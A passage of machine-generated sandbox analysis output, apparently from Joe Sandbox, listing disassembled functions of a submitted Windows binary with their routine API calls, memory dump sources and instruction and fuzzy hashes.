                                                                                                                                                      • Instruction ID: c3c5b3fcc9e0ba5371325135898a609ce9dbe5f7953ca91378e4838c7b96f473
                                                                                                                                                      • Opcode Fuzzy Hash: ab0d5e5687075731c68e6716899be4e560a88be0dbd684347f0ea59126789574
                                                                                                                                                      • Instruction Fuzzy Hash: A511CE31600720AFE724D76CE940BA6B3E9AB45371F604738E092D25D0D7B0FD86C760
                                                                                                                                                      Function 00A43C78 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 00A43C82
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A43C99
                                                                                                                                                        • Part of subcall function 00A36A89: _wcslen.LIBCMT ref: 00A36AA6
                                                                                                                                                        • Part of subcall function 00A2B03D: __EH_prolog3_GS.LIBCMT ref: 00A2B044
                                                                                                                                                        • Part of subcall function 00A2B3E1: __EH_prolog3_GS.LIBCMT ref: 00A2B3E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1265872803-0
                                                                                                                                                      • Opcode ID: aa5bb9eacc992d0d1aaede178e8894fb4c0b3186679de1c86e56faf93f8429e0
                                                                                                                                                      • Instruction ID: 3743cd454796700bf669335886f2cdb310118301984e9764808d06ec46199339
                                                                                                                                                      • Opcode Fuzzy Hash: aa5bb9eacc992d0d1aaede178e8894fb4c0b3186679de1c86e56faf93f8429e0
                                                                                                                                                      • Instruction Fuzzy Hash: 6811C634D11A909FC704EBF8AD55B9C7BB4AB55310F04C1BAE4089B253CBF00A85D7B2
                                                                                                                                                      Function 00A21CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A21CE9
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00A21D01
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_Item_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 896027972-0
                                                                                                                                                      • Opcode ID: c5b52c4563cb4497215842fa4439a16a1ca4ae66b0f2bfcaeb3df0e3f7307e74
                                                                                                                                                      • Instruction ID: df56d07e17316cdf44b55bce648cfb48ad82e15a7d7fc6e8d94b2c470a074341
                                                                                                                                                      • Opcode Fuzzy Hash: c5b52c4563cb4497215842fa4439a16a1ca4ae66b0f2bfcaeb3df0e3f7307e74
                                                                                                                                                      • Instruction Fuzzy Hash: 64018471A00224DFDB24EFACE946BEDB7E8BF64350F40052AF816A7192C7745A45CB50
                                                                                                                                                      Function 00A376A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00A376EA,00A30B6F), ref: 00A376B4
                                                                                                                                                      • GetProcessAffinityMask.KERNEL32(00000000,?,00A376EA), ref: 00A376BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1231390398-0
                                                                                                                                                      • Opcode ID: 5b86eabd83a8145b401d700dbb17d5fac3a29eb1a65cc279ff9a3b0254b0022b
                                                                                                                                                      • Instruction ID: 7dcf3e678a8a9afe22913eda1973eb435e8e058d82736c3b92de906c2825a4cb
                                                                                                                                                      • Opcode Fuzzy Hash: 5b86eabd83a8145b401d700dbb17d5fac3a29eb1a65cc279ff9a3b0254b0022b
                                                                                                                                                      • Instruction Fuzzy Hash: DFE0D8B3F14706ABCF29C7AD9C169EF72DDEA44255B145079F413D3500FA74DD0156A0
                                                                                                                                                      Function 00A3F53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00A59B73,000000FF), ref: 00A3F578
                                                                                                                                                      • CoUninitialize.COMBASE(?,?,?,?,00A59B73,000000FF), ref: 00A3F57D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3856339756-0
                                                                                                                                                      • Opcode ID: 44a1dd66cee6f62d2c4c2788fe1a976e91656c3723fef9beaa465155f70c4136
                                                                                                                                                      • Instruction ID: c76fbb86d5fd45376a9fa7b95fbeb0152edc6c6647a363c76aaf8c9c824b42d4
                                                                                                                                                      • Opcode Fuzzy Hash: 44a1dd66cee6f62d2c4c2788fe1a976e91656c3723fef9beaa465155f70c4136
                                                                                                                                                      • Instruction Fuzzy Hash: B5F08276A04A44EFC701DFA9EC41B4AFBF8FB48770F004626E91AC7760CB74A801CA94
                                                                                                                                                      Function 00A3E849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3E86A
                                                                                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A3E871
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1918208029-0
                                                                                                                                                      • Opcode ID: 2e6b0cbca121e85a3b798e4931661741a06c26d825884ec51e3759b789d2d0e8
                                                                                                                                                      • Instruction ID: 5622e7acb5d58397180f7a8f29c4956c664caf720f74033f3c303f35c8aa08d4
                                                                                                                                                      • Opcode Fuzzy Hash: 2e6b0cbca121e85a3b798e4931661741a06c26d825884ec51e3759b789d2d0e8
                                                                                                                                                      • Instruction Fuzzy Hash: 42E01275901218EFDB20DF55C9057DEBBF8EB44351F20845AB88993641D670AE04DF91
                                                                                                                                                      Function 00A21E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemShowWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3351165006-0
                                                                                                                                                      • Opcode ID: cadda3c4ee67334b184dad80831606a656b53a34c1eeaca727cd34c89b8ed46e
                                                                                                                                                      • Instruction ID: 707a25acc74126af800d026ce75d528554549255fa58faadef4c53a52b3ec1a6
                                                                                                                                                      • Opcode Fuzzy Hash: cadda3c4ee67334b184dad80831606a656b53a34c1eeaca727cd34c89b8ed46e
                                                                                                                                                      • Instruction Fuzzy Hash: 54C0123205C200BECB018BB0DC09D2EBBA8ABA4212F80CA28B0A9C0070C239C090DB91
                                                                                                                                                      Function 00A21CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00A21CD2
                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00A21CD9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallbackDispatcherItemUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4250310104-0
                                                                                                                                                      • Opcode ID: 9d20655099427c590841a931840ff3df79fce4fbf0ac49135951fb9820af90a7
                                                                                                                                                      • Instruction ID: bb2ca0b798e2fa26e7d118f9ede7560b889eb198c31af0429eb11463436b84a4
                                                                                                                                                      • Opcode Fuzzy Hash: 9d20655099427c590841a931840ff3df79fce4fbf0ac49135951fb9820af90a7
                                                                                                                                                      • Instruction Fuzzy Hash: F1C04C7640C240BFCB019BE09D1CC2FBFA9AB95311F40CA59B6A9C0130C6358451DB11
                                                                                                                                                      Function 00A227E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 0d40bcaa2bbb1f0fc8d5cae4094bc45fa1ddafd6c6fc317642709233a51d2914
                                                                                                                                                      • Instruction ID: 6e1b576bd624d177c88d826978ce287f9701a65f0891ffe05c81f4bd21a8c65b
                                                                                                                                                      • Opcode Fuzzy Hash: 0d40bcaa2bbb1f0fc8d5cae4094bc45fa1ddafd6c6fc317642709233a51d2914
                                                                                                                                                      • Instruction Fuzzy Hash: 47C18C70A04364AFDF25DF6CE8947ED7BA4AB49310F1800B9EC05DF296C7749985CBA2
                                                                                                                                                      Function 00A39556 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 81a7bde6cd0b2158cef1d0d86f65db2c6d365a169719fef7ff525f1a345e49d2
                                                                                                                                                      • Instruction ID: b59811ee0a33bc5be04048de66d9f0e19cae4af87c93a60a50d88f67137229af
                                                                                                                                                      • Opcode Fuzzy Hash: 81a7bde6cd0b2158cef1d0d86f65db2c6d365a169719fef7ff525f1a345e49d2
                                                                                                                                                      • Instruction Fuzzy Hash: 468104719083559FDB28EF68C986B6FB7E9FF80310F14092EF45597281EBF099488792
                                                                                                                                                      Function 00A220B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A220B7
                                                                                                                                                        • Part of subcall function 00A280EC: __EH_prolog3.LIBCMT ref: 00A280F3
                                                                                                                                                        • Part of subcall function 00A32815: __EH_prolog3.LIBCMT ref: 00A3281C
                                                                                                                                                        • Part of subcall function 00A276E7: __EH_prolog3.LIBCMT ref: 00A276EE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 838a43f2fa718eb643f457548b932d27ee11c7424f2d4567dbaa9dd6bf6c5bcb
                                                                                                                                                      • Instruction ID: 36d888d0a9ff887d7f71478e64115dfbfb2ce1e33c65032c94d80300b2416027
                                                                                                                                                      • Opcode Fuzzy Hash: 838a43f2fa718eb643f457548b932d27ee11c7424f2d4567dbaa9dd6bf6c5bcb
                                                                                                                                                      • Instruction Fuzzy Hash: D051F4B19057808EDB44DF6995807C9BBE0AF99300F0886BEDC4DCF6ABD7744254CB61
                                                                                                                                                      Function 00A2B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2B3E8
                                                                                                                                                        • Part of subcall function 00A2F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00A2A684,?,?,00000000,?,?,?,?,?,?), ref: 00A2F739
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFindH_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2672038326-0
                                                                                                                                                      • Opcode ID: bf5088e5f74d18aa450f7011884a32f317b53f98e877153d3190066fbd70a490
                                                                                                                                                      • Instruction ID: cc6e0430ed8b52d230b118bb43b855f3c4a923d40dfad973a4fd421ed661e68d
                                                                                                                                                      • Opcode Fuzzy Hash: bf5088e5f74d18aa450f7011884a32f317b53f98e877153d3190066fbd70a490
                                                                                                                                                      • Instruction Fuzzy Hash: DA417670910B28CFDB24EFADE9C1BAAB7B1BF05304F54443DE15A9B252D734A846CB21
                                                                                                                                                      Function 00A22C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A22C37
                                                                                                                                                        • Part of subcall function 00A3880E: __EH_prolog3.LIBCMT ref: 00A38815
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3355343447-0
                                                                                                                                                      • Opcode ID: 5335ce168b80cb0b00bbdb47a8f3f91dd7b47981ddac857733feefa1f9481597
                                                                                                                                                      • Instruction ID: b24100dd78bb2702d1a85f0f052b52e34bb2361d2a1ccce915156b1b5cd57f21
                                                                                                                                                      • Opcode Fuzzy Hash: 5335ce168b80cb0b00bbdb47a8f3f91dd7b47981ddac857733feefa1f9481597
                                                                                                                                                      • Instruction Fuzzy Hash: D6310F75D0121CFECF19DBE8E991AEEBBB9AF18340F54043AF405A7251DB349945CB60
                                                                                                                                                      Function 00A276E7 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A276EE
                                                                                                                                                        • Part of subcall function 00A34F2B: __EH_prolog3.LIBCMT ref: 00A34F32
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 85d4cd8853af708ac74c018c5a184247f6a30e3e4434d6cdc4909b26781d849e
                                                                                                                                                      • Instruction ID: 1796f3c48e31a6e2df02db1983c8d0155b6c809673010a8e4136c8165d438a0f
                                                                                                                                                      • Opcode Fuzzy Hash: 85d4cd8853af708ac74c018c5a184247f6a30e3e4434d6cdc4909b26781d849e
                                                                                                                                                      • Instruction Fuzzy Hash: 714152B4806B85DAC725DF7A92493CAFBE8AFA4300F10995FD1AE93361D7B025048F19
                                                                                                                                                      Function 00A397A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: c340e9d581ab02240d0a515c51e872d1a4a837a17175057b36bd9ffb04591d7b
                                                                                                                                                      • Instruction ID: f4619288fd4b75ed087f3aaf0f4bc98d4591f2d90e9b973edb3af0051a6d951d
                                                                                                                                                      • Opcode Fuzzy Hash: c340e9d581ab02240d0a515c51e872d1a4a837a17175057b36bd9ffb04591d7b
                                                                                                                                                      • Instruction Fuzzy Hash: 6521C575E00616ABEF18EF788D46A5F76A4BF85314F05063AF505AB2C2E7B09D40C7E4
                                                                                                                                                      Function 00A2D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                      • Opcode ID: 429cf5d7e1cc259708b6e9ca53865d3757c7cd7a2aa1153b0adaaf5be8eaf76b
                                                                                                                                                      • Instruction ID: 9cda0dcdfe320bbcdd7fb4b5626386a4224f9354d964994af6aaf556b1f87dbf
